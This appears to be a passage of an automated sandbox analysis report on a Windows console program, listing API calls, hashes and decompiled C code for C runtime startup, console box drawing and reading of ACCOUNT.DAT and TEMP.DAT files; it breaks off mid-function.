                                                0x0123a79f
                                                0x00000000
                                                0x00000000
                                                0x0123a7a1
                                                0x0123a7a7
                                                0x0123a7aa
                                                0x0123a7ad
                                                0x0123a7b1
                                                0x0123a7b7
                                                0x0123a7ba
                                                0x0123a7bd
                                                0x0123a7c0
                                                0x0123a7c0
                                                0x0123a7c5
                                                0x0123a7c6
                                                0x0123a7c9
                                                0x00000000
                                                0x0123a7c9
                                                0x0123a6f6
                                                0x0123a6fc
                                                0x00000000
                                                0x0123a6fc
                                                0x0123a6ff
                                                0x0123a701
                                                0x0123a704
                                                0x0123a707
                                                0x0123a70a
                                                0x0123a70a
                                                0x0123a70c
                                                0x00000000
                                                0x00000000
                                                0x0123a712
                                                0x0123a714
                                                0x0123a717
                                                0x0123a771
                                                0x0123a771
                                                0x0123a772
                                                0x0123a778
                                                0x0123a779
                                                0x0123a77c
                                                0x0123a77f
                                                0x00000000
                                                0x0123a77f
                                                0x0123a719
                                                0x0123a71c
                                                0x00000000
                                                0x00000000
                                                0x0123a71e
                                                0x0123a720
                                                0x0123a722
                                                0x00000000
                                                0x00000000
                                                0x0123a724
                                                0x0123a726
                                                0x0123a736
                                                0x0123a743
                                                0x0123a74a
                                                0x0123a74f
                                                0x0123a756
                                                0x0123a75e
                                                0x0123a762
                                                0x0123a768
                                                0x0123a768
                                                0x0123a768
                                                0x0123a76b
                                                0x0123a76e
                                                0x0123a76e
                                                0x00000000
                                                0x0123a76e
                                                0x0123a729
                                                0x0123a72f
                                                0x0123a732
                                                0x0123a734
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123a734
                                                0x00000000
                                                0x0123a70a
                                                0x0123a642
                                                0x0123a64a
                                                0x00000000
                                                0x0123a64a
                                                0x0123a60e
                                                0x00000000

                                                APIs
                                                • __lock.LIBCMT ref: 0123A5F0
                                                  • Part of subcall function 0123BE5F: __mtinitlocknum.LIBCMT ref: 0123BE71
                                                  • Part of subcall function 0123BE5F: EnterCriticalSection.KERNEL32(?,?,0123D668,0000000D,?,?,?,?,0124DA28,00000008,0123D601,00000000,00000000,01238F04,01241E56,00000000), ref: 0123BE8A
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A60E
                                                • __calloc_crt.LIBCMT ref: 0123A627
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A642
                                                • GetStartupInfoW.KERNEL32(?,0124D8C0,00000064), ref: 0123A697
                                                • __calloc_crt.LIBCMT ref: 0123A6E2
                                                • GetFileType.KERNEL32(00000001), ref: 0123A729
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0123A762
                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0123A81B
                                                • GetFileType.KERNEL32(00000000), ref: 0123A82D
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(-01252F54,00000FA0), ref: 0123A862
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1456538442-0
                                                • Opcode ID: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction ID: d3a5339f0ff54ce574991e69b7e1bb8cd5b723a080aac4cff005c7f88482fc43
                                                • Opcode Fuzzy Hash: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction Fuzzy Hash: 9191E0B1924346CFDB25CFA8D8845ADBBB4AF85324B24426ED5A6EB2D1D7349803CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _t17;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				signed int _t38;
                                                				void* _t40;
                                                				void* _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t60;
                                                
                                                				_t60 = __fp0;
                                                				_t47 = __edi;
                                                				_t46 = __edx;
                                                				E0123FC48();
                                                				_push(0x14);
                                                				_push(0x124d838);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t49 = E0123C013() & 0x0000ffff;
                                                				E0123FBFB(2);
                                                				_t53 =  *0x1230000 - 0x5a4d; // 0x5a4d
                                                				if(_t53 == 0) {
                                                					_t17 =  *0x123003c; // 0xf0
                                                					__eflags =  *((intOrPtr*)(_t17 + 0x1230000)) - 0x4550;
                                                					if( *((intOrPtr*)(_t17 + 0x1230000)) != 0x4550) {
                                                						goto L2;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t17 + 0x1230018)) - 0x10b;
                                                						if( *((intOrPtr*)(_t17 + 0x1230018)) != 0x10b) {
                                                							goto L2;
                                                						} else {
                                                							_t38 = 0;
                                                							__eflags =  *((intOrPtr*)(_t17 + 0x1230074)) - 0xe;
                                                							if( *((intOrPtr*)(_t17 + 0x1230074)) > 0xe) {
                                                								__eflags =  *(_t17 + 0x12300e8);
                                                								_t6 =  *(_t17 + 0x12300e8) != 0;
                                                								__eflags = _t6;
                                                								_t38 = 0 | _t6;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				 *(_t51 - 0x1c) = _t38;
                                                				if(E0123D058() == 0) {
                                                					E012389F5(0x1c);
                                                				}
                                                				if(E0123D6D2(_t38, _t47) == 0) {
                                                					_t19 = E012389F5(0x10);
                                                				}
                                                				E0123BE1F(_t19);
                                                				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                				E0123A5C3();
                                                				 *0x1254080 = GetCommandLineA();
                                                				 *0x1252284 = E0123FCE2();
                                                				_t24 = E0123F8ED();
                                                				_t56 = _t24;
                                                				if(_t24 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                				}
                                                				_t25 = E0123FB1A(_t38, _t46, _t47, _t49);
                                                				_t57 = _t25;
                                                				if(_t25 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                				}
                                                				_t26 = E01237559(_t47, _t49, 1);
                                                				_pop(_t40);
                                                				_t58 = _t26;
                                                				if(_t26 != 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                					_pop(_t40);
                                                				}
                                                				_t50 = E01231040(_t40, _t47, _t49, _t58, _t60, 0x1230000, 0, E0123FD6D(), _t49);
                                                				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                				if(_t38 == 0) {
                                                					E012377B1(_t50);
                                                				}
                                                				E0123754A();
                                                				 *(_t51 - 4) = 0xfffffffe;
                                                				return E012391A5(_t50);
                                                			}














                                                0x012388a7
                                                0x012388a7
                                                0x012388a7
                                                0x012388a7
                                                0x012388b1
                                                0x012388b3
                                                0x012388b8
                                                0x012388c2
                                                0x012388c7
                                                0x012388d2
                                                0x012388d9
                                                0x012388df
                                                0x012388e4
                                                0x012388ee
                                                0x00000000
                                                0x012388f0
                                                0x012388f5
                                                0x012388fc
                                                0x00000000
                                                0x012388fe
                                                0x012388fe
                                                0x01238900
                                                0x01238907
                                                0x01238909
                                                0x0123890f
                                                0x0123890f
                                                0x0123890f
                                                0x0123890f
                                                0x01238907
                                                0x012388fc
                                                0x012388db
                                                0x012388db
                                                0x012388db
                                                0x012388db
                                                0x01238912
                                                0x0123891c
                                                0x01238920
                                                0x01238925
                                                0x0123892d
                                                0x01238931
                                                0x01238936
                                                0x01238937
                                                0x0123893c
                                                0x01238940
                                                0x0123894b
                                                0x01238955
                                                0x0123895a
                                                0x0123895f
                                                0x01238961
                                                0x01238965
                                                0x0123896a
                                                0x0123896b
                                                0x01238970
                                                0x01238972
                                                0x01238976
                                                0x0123897b
                                                0x0123897e
                                                0x01238983
                                                0x01238984
                                                0x01238986
                                                0x01238989
                                                0x0123898e
                                                0x0123898e
                                                0x012389a2
                                                0x012389a4
                                                0x012389a9
                                                0x012389ac
                                                0x012389ac
                                                0x012389b1
                                                0x012389e6
                                                0x012389f4

                                                APIs
                                                • ___security_init_cookie.LIBCMT ref: 012388A7
                                                  • Part of subcall function 0123C013: GetStartupInfoW.KERNEL32(?), ref: 0123C01D
                                                • _fast_error_exit.LIBCMT ref: 01238920
                                                • _fast_error_exit.LIBCMT ref: 01238931
                                                • __RTC_Initialize.LIBCMT ref: 01238937
                                                • __ioinit0.LIBCMT ref: 01238940
                                                • GetCommandLineA.KERNEL32(0124D838,00000014), ref: 01238945
                                                • ___crtGetEnvironmentStringsA.LIBCMT ref: 01238950
                                                • __setargv.LIBCMT ref: 0123895A
                                                • __setenvp.LIBCMT ref: 0123896B
                                                • __cinit.LIBCMT ref: 0123897E
                                                • __wincmdln.LIBCMT ref: 0123898F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                • String ID:
                                                • API String ID: 1504447550-0
                                                • Opcode ID: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction ID: acb88bd50112b435b4ca55ab7925efa647529ededd94379bb1d7c77e9e9c0735
                                                • Opcode Fuzzy Hash: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction Fuzzy Hash: 3A210AF0A303079AEF297BB87989B3D61546FE0711F100629FA05AF1C1EFB485459767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01238E23(void* __eflags, signed int _a4) {
                                                				void* _t12;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				intOrPtr _t18;
                                                				void* _t22;
                                                				signed int _t35;
                                                				long _t40;
                                                
                                                				_t13 = E0123A5A7(_t12);
                                                				if(_t13 >= 0) {
                                                					_t35 = _a4;
                                                					if(E01240132(_t35) == 0xffffffff) {
                                                						L10:
                                                						_t40 = 0;
                                                					} else {
                                                						_t18 =  *0x1252f60; // 0x0
                                                						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                								goto L8;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						} else {
                                                							L7:
                                                							_t22 = E01240132(2);
                                                							if(E01240132(1) == _t22) {
                                                								goto L10;
                                                							} else {
                                                								L8:
                                                								if(CloseHandle(E01240132(_t35)) != 0) {
                                                									goto L10;
                                                								} else {
                                                									_t40 = GetLastError();
                                                								}
                                                							}
                                                						}
                                                					}
                                                					E012400AC(_t35);
                                                					 *((char*)( *((intOrPtr*)(0x1252f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                					if(_t40 == 0) {
                                                						_t16 = 0;
                                                					} else {
                                                						_t16 = E01238EDE(_t40) | 0xffffffff;
                                                					}
                                                					return _t16;
                                                				} else {
                                                					return _t13 | 0xffffffff;
                                                				}
                                                			}










                                                0x01238e26
                                                0x01238e2d
                                                0x01238e36
                                                0x01238e43
                                                0x01238e95
                                                0x01238e95
                                                0x01238e45
                                                0x01238e45
                                                0x01238e4d
                                                0x01238e5b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01238e63
                                                0x01238e63
                                                0x01238e65
                                                0x01238e77
                                                0x00000000
                                                0x01238e79
                                                0x01238e79
                                                0x01238e89
                                                0x00000000
                                                0x01238e8b
                                                0x01238e91
                                                0x01238e91
                                                0x01238e89
                                                0x01238e77
                                                0x01238e4d
                                                0x01238e98
                                                0x01238eb0
                                                0x01238eb7
                                                0x01238ec5
                                                0x01238eb9
                                                0x01238ec0
                                                0x01238ec0
                                                0x01238eca
                                                0x01238e2f
                                                0x01238e33
                                                0x01238e33

                                                APIs
                                                • __ioinit.LIBCMT ref: 01238E26
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                • __get_osfhandle.LIBCMT ref: 01238E3A
                                                • __get_osfhandle.LIBCMT ref: 01238E65
                                                • __get_osfhandle.LIBCMT ref: 01238E6E
                                                • __get_osfhandle.LIBCMT ref: 01238E7A
                                                • CloseHandle.KERNEL32(00000000,01232656,00000000,?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E81
                                                • GetLastError.KERNEL32(?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E8B
                                                • __free_osfhnd.LIBCMT ref: 01238E98
                                                • __dosmaperr.LIBCMT ref: 01238EBA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                • String ID:
                                                • API String ID: 974577687-0
                                                • Opcode ID: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction ID: 2e61fbbffd079c0724c4cb380e572d66de274ccfef6c0ece69cbc68b92e70275
                                                • Opcode Fuzzy Hash: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction Fuzzy Hash: 921125B2A312125AE636227CA84877E7B595FD1734F150309FB288F1C2EAB4D4818260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01233B48
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _fprintf.LIBCMT ref: 01233DA6
                                                Strings
                                                • TEMP.DAT, xrefs: 01233AE2
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01233B3D
                                                • ACCOUNT.DAT, xrefs: 01233ABE
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01233D9A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                • API String ID: 1563022539-2055742014
                                                • Opcode ID: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction ID: 1e0091e21be034537487b3644022e42d3baa6bba919610de958e542c07569839
                                                • Opcode Fuzzy Hash: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction Fuzzy Hash: 5491A672D105599FCB09DFA8E991BEDFBB9FF85300F04826EE006BA185E6745684CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01231380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				void* __ebp;
                                                				intOrPtr _t61;
                                                				intOrPtr _t67;
                                                				void* _t75;
                                                				intOrPtr _t87;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t105;
                                                				void* _t106;
                                                
                                                				_t102 = __esi;
                                                				_t101 = __edi;
                                                				E012312B0(_a4, _a8);
                                                				_push(0xc9);
                                                				_push("%c");
                                                				E0123715C(_t75, __edi, __esi, __eflags);
                                                				_t104 = _t103 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					_t109 = _v8 - _a12 - 1;
                                                					if(_v8 >= _a12 - 1) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _a8);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, _t109);
                                                					_t104 = _t104 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(_v8, _a8);
                                                				_push(0xbb);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t105 = _t104 + 8;
                                                				_v12 = _a8 + 1;
                                                				while(1) {
                                                					__eflags = _v12 - _a16;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_a4, _v12);
                                                					_v8 = _a4;
                                                					while(1) {
                                                						__eflags = _v8 - _a12;
                                                						if(_v8 >= _a12) {
                                                							break;
                                                						}
                                                						__eflags = _v8 - _a4;
                                                						if(__eflags == 0) {
                                                							L12:
                                                							E012312B0(_v8, _v12);
                                                							_push(0xba);
                                                							_push("%c");
                                                							E0123715C(_t75, _t101, _t102, __eflags);
                                                							_t105 = _t105 + 8;
                                                						} else {
                                                							__eflags = _v8 - _a12 - 1;
                                                							if(__eflags == 0) {
                                                								goto L12;
                                                							}
                                                						}
                                                						_t67 = _v8 + 1;
                                                						__eflags = _t67;
                                                						_v8 = _t67;
                                                					}
                                                					_t87 = _v12 + 1;
                                                					__eflags = _t87;
                                                					_v12 = _t87;
                                                				}
                                                				E012312B0(_a4, _v12);
                                                				_push(0xc8);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t106 = _t105 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					__eflags = _v8 - _a12 - 1;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _v12);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, __eflags);
                                                					_t106 = _t106 + 8;
                                                					_t61 = _v8 + 1;
                                                					__eflags = _t61;
                                                					_v8 = _t61;
                                                				}
                                                				E012312B0(_v8, _v12);
                                                				_push(0xbc);
                                                				_push("%c");
                                                				return E0123715C(_t75, _t101, _t102, __eflags);
                                                			}














                                                0x01231380
                                                0x01231380
                                                0x0123138e
                                                0x01231393
                                                0x01231398
                                                0x0123139d
                                                0x012313a2
                                                0x012313ab
                                                0x012313b9
                                                0x012313bf
                                                0x012313c2
                                                0x00000000
                                                0x00000000
                                                0x012313cc
                                                0x012313d1
                                                0x012313d6
                                                0x012313db
                                                0x012313e0
                                                0x012313b6
                                                0x012313b6
                                                0x012313ed
                                                0x012313f2
                                                0x012313f7
                                                0x012313fc
                                                0x01231401
                                                0x0123140a
                                                0x01231418
                                                0x0123141b
                                                0x0123141e
                                                0x00000000
                                                0x00000000
                                                0x01231428
                                                0x01231430
                                                0x0123143e
                                                0x01231441
                                                0x01231444
                                                0x00000000
                                                0x00000000
                                                0x01231449
                                                0x0123144c
                                                0x01231459
                                                0x01231461
                                                0x01231466
                                                0x0123146b
                                                0x01231470
                                                0x01231475
                                                0x0123144e
                                                0x01231454
                                                0x01231457
                                                0x00000000
                                                0x00000000
                                                0x01231457
                                                0x01231438
                                                0x01231438
                                                0x0123143b
                                                0x0123143b
                                                0x01231412
                                                0x01231412
                                                0x01231415
                                                0x01231415
                                                0x01231484
                                                0x01231489
                                                0x0123148e
                                                0x01231493
                                                0x01231498
                                                0x012314a1
                                                0x012314af
                                                0x012314b5
                                                0x012314b8
                                                0x00000000
                                                0x00000000
                                                0x012314c2
                                                0x012314c7
                                                0x012314cc
                                                0x012314d1
                                                0x012314d6
                                                0x012314a9
                                                0x012314a9
                                                0x012314ac
                                                0x012314ac
                                                0x012314e3
                                                0x012314e8
                                                0x012314ed
                                                0x012314fd

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123139D
                                                • _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012313FC
                                                • _wprintf.LIBCMT ref: 01231470
                                                • _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 012314D1
                                                • _wprintf.LIBCMT ref: 012314F2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID:
                                                • API String ID: 1778593935-0
                                                • Opcode ID: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction ID: 8c03bac9d8d8c861079f4183ec1c32dae2de8ece5af7cbee838b039b6d6bb4dd
                                                • Opcode Fuzzy Hash: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction Fuzzy Hash: F84133F5A3420AFBCB04EFA8CD41EAE7775EFD5300F108159EA05AB340D670AB649B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0123D6D2(void* __ebx, void* __edi) {
                                                				void* __esi;
                                                				void* _t3;
                                                				intOrPtr _t6;
                                                				long _t14;
                                                				long* _t27;
                                                
                                                				E012375FE(_t3);
                                                				if(E0123BF8E() != 0) {
                                                					_t6 = E0123BFD8(_t5, E0123D468);
                                                					 *0x1251a40 = _t6;
                                                					__eflags = _t6 - 0xffffffff;
                                                					if(_t6 == 0xffffffff) {
                                                						goto L1;
                                                					} else {
                                                						_t27 = E0123C55B(1, 0x3b8);
                                                						__eflags = _t27;
                                                						if(_t27 == 0) {
                                                							L6:
                                                							E0123D748();
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							__eflags = E0123C002(_t9,  *0x1251a40, _t27);
                                                							if(__eflags == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(0);
                                                								_push(_t27);
                                                								E0123D626(__ebx, __edi, _t27, __eflags);
                                                								_t14 = GetCurrentThreadId();
                                                								_t27[1] = _t27[1] | 0xffffffff;
                                                								 *_t27 = _t14;
                                                								__eflags = 1;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					E0123D748();
                                                					return 0;
                                                				}
                                                			}








                                                0x0123d6d2
                                                0x0123d6de
                                                0x0123d6ed
                                                0x0123d6f3
                                                0x0123d6f8
                                                0x0123d6fb
                                                0x00000000
                                                0x0123d6fd
                                                0x0123d70a
                                                0x0123d70e
                                                0x0123d710
                                                0x0123d73f
                                                0x0123d73f
                                                0x0123d744
                                                0x0123d747
                                                0x0123d712
                                                0x0123d720
                                                0x0123d722
                                                0x00000000
                                                0x0123d724
                                                0x0123d724
                                                0x0123d726
                                                0x0123d727
                                                0x0123d72e
                                                0x0123d734
                                                0x0123d738
                                                0x0123d73c
                                                0x0123d73e
                                                0x0123d73e
                                                0x0123d722
                                                0x0123d710
                                                0x0123d6e0
                                                0x0123d6e0
                                                0x0123d6e0
                                                0x0123d6e7
                                                0x0123d6e7

                                                APIs
                                                • __init_pointers.LIBCMT ref: 0123D6D2
                                                  • Part of subcall function 012375FE: EncodePointer.KERNEL32(00000000,?,0123D6D7,0123892B,0124D838,00000014), ref: 01237601
                                                  • Part of subcall function 012375FE: __initp_misc_winsig.LIBCMT ref: 01237622
                                                • __mtinitlocks.LIBCMT ref: 0123D6D7
                                                  • Part of subcall function 0123BF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012513D0,00000FA0,?,?,0123D6DC,0123892B,0124D838,00000014), ref: 0123BFAC
                                                • __mtterm.LIBCMT ref: 0123D6E0
                                                • __calloc_crt.LIBCMT ref: 0123D705
                                                • __initptd.LIBCMT ref: 0123D727
                                                • GetCurrentThreadId.KERNEL32 ref: 0123D72E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 2211675822-0
                                                • Opcode ID: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction ID: 7980fe4ec559113fe8c3f0a295304233713501a1f50290607d484c6b11b841ea
                                                • Opcode Fuzzy Hash: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction Fuzzy Hash: 91F0F6F25797571BE73A3ABC780676636D48BD1670B60061AF525D60C4EE20D0418594
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0123BB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t45;
                                                				signed int _t48;
                                                				signed int _t52;
                                                				void* _t60;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t85;
                                                				void* _t86;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				signed int* _t92;
                                                
                                                				_t44 = E0123A5A7(_t43);
                                                				if(_t44 >= 0) {
                                                					_t92 = _a8;
                                                					_t45 = E01238BB2(_t92);
                                                					_t74 = _t92[3];
                                                					_t89 = _t45;
                                                					__eflags = _t74 & 0x00000082;
                                                					if(__eflags != 0) {
                                                						__eflags = _t74 & 0x00000040;
                                                						if(__eflags == 0) {
                                                							_t70 = 0;
                                                							__eflags = _t74 & 0x00000001;
                                                							if((_t74 & 0x00000001) == 0) {
                                                								L10:
                                                								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                								_t92[3] = _t48;
                                                								_t92[1] = _t70;
                                                								__eflags = _t48 & 0x0000010c;
                                                								if((_t48 & 0x0000010c) == 0) {
                                                									_t60 = E01238C70();
                                                									__eflags = _t92 - _t60 + 0x20;
                                                									if(_t92 == _t60 + 0x20) {
                                                										L13:
                                                										_t62 = E012411E7(_t89);
                                                										__eflags = _t62;
                                                										if(_t62 == 0) {
                                                											goto L14;
                                                										}
                                                									} else {
                                                										_t64 = E01238C70();
                                                										__eflags = _t92 - _t64 + 0x40;
                                                										if(_t92 != _t64 + 0x40) {
                                                											L14:
                                                											E0124192E(_t92);
                                                										} else {
                                                											goto L13;
                                                										}
                                                									}
                                                								}
                                                								__eflags = _t92[3] & 0x00000108;
                                                								if((_t92[3] & 0x00000108) == 0) {
                                                									__eflags = 1;
                                                									_push(1);
                                                									_v8 = 1;
                                                									_push( &_a4);
                                                									_push(_t89);
                                                									_t45 = E01240343(_t70, _t86, _t89, _t92, 1);
                                                									_t70 = _t45;
                                                									goto L27;
                                                								} else {
                                                									_t87 = _t92[2];
                                                									_t25 = _t87 + 1; // 0x1a06
                                                									 *_t92 = _t25;
                                                									_t76 =  *_t92 - _t87;
